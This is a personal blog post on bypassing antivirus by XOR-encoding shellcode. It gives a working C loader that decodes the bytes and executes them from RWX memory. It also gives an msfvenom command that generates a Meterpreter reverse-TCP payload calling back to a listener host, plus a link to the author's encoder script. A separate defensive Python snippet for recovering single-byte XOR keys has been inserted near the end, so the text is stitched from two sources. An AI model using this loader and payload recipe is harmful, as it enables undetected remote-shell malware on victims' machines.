Monday, March 21, 2016

XOR Your Shellcode.

So the other day I was messing about and stumbled across this link: Bypassing AV with 10 lines. The author does a really good job and I suggest reading it. To sum it up: if you generate shellcode, you can XOR it with a random key, compile it, and you won't get flagged. That's not to say the heuristics won't pick you up, but the signatures sure won't! Anyway, the compile code looks something like this.

 #include <windows.h>
 #include <iostream>
 #include <cstring>   // memcpy

 int main(int argc, char **argv) {
     // XOR-encoded shellcode bytes, as produced by the script described in this post
     char b[] = {0x34,0xa8,0x47 --SNIP--};
     char c[sizeof b];
     // Decode: XOR every byte with the same single-byte key used to encode it
     for (size_t i = 0; i < sizeof b; i++) { c[i] = b[i] ^ 0x89; }
     // Allocate RWX memory, copy the decoded bytes in, and jump to them
     void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
     if (exec == NULL) { return 1; }
     memcpy(exec, c, sizeof c);
     ((void(*)())exec)();
     return 0;
 }


It works great, and all we have to do is XOR our code, format it properly, and put it in there. If you read my last post you'll realize that XOR'ing is super simple. But I decided to whip up a little script so I could do it on the fly.

You can find it here: https://github.com/trump0dump/helpful/blob/master/xor_shellcode.py. It's really very simple.

You start by generating your shellcode with something like so:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f hex > shell_code

That will output into a file formatted like this:

bd21ce1d21ddc2d9 --SNIP-- 59b7683

We then read that file, XOR each byte, format it as a C array, and write it out to the file to be compiled.
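A single-byte XOR key is only a 256-way search, which is why signatures miss it but an analyst or heuristic scanner does not. The following is an added example of mine, not the post's script: it brute-forces the key of an encoded blob given the first bytes the decoded payload is expected to start with. The marker value and the sample bytes are constructed for the demo, not taken from any real payload.

```python
from typing import Optional, Tuple

# Constructed marker: the leading bytes an analyst expects the decoded payload
# to begin with (assumption for this demo; in practice it comes from prior
# analysis of the payload family being hunted).
MARKER = b"\xfc\xe8"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same loop the C loader above runs to decode."""
    return bytes(b ^ key for b in data)


def recover_single_byte_xor(blob: bytes, marker: bytes) -> Optional[Tuple[int, int, bytes]]:
    """Try every one of the 256 possible keys and return (key, offset, decoded)
    for the first key whose decoded output contains the marker, else None.
    Key 0x00 is included, so an unencoded payload is found as well."""
    for key in range(256):
        decoded = xor_bytes(blob, key)
        offset = decoded.find(marker)
        if offset != -1:
            return key, offset, decoded
    return None


def demo() -> int:
    """Encode a constructed payload with the post's key (0x89), then recover it."""
    plain = MARKER + bytes(range(0x10, 0x40))   # constructed, not real shellcode
    blob = xor_bytes(plain, 0x89)
    hit = recover_single_byte_xor(blob, MARKER)
    assert hit is not None
    key, offset, decoded = hit
    assert decoded == plain and offset == 0      # XOR is its own inverse
    return key


if __name__ == "__main__":
    print("recovered key: 0x%02x" % demo())
```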

Simple, Sweet, and Easy.
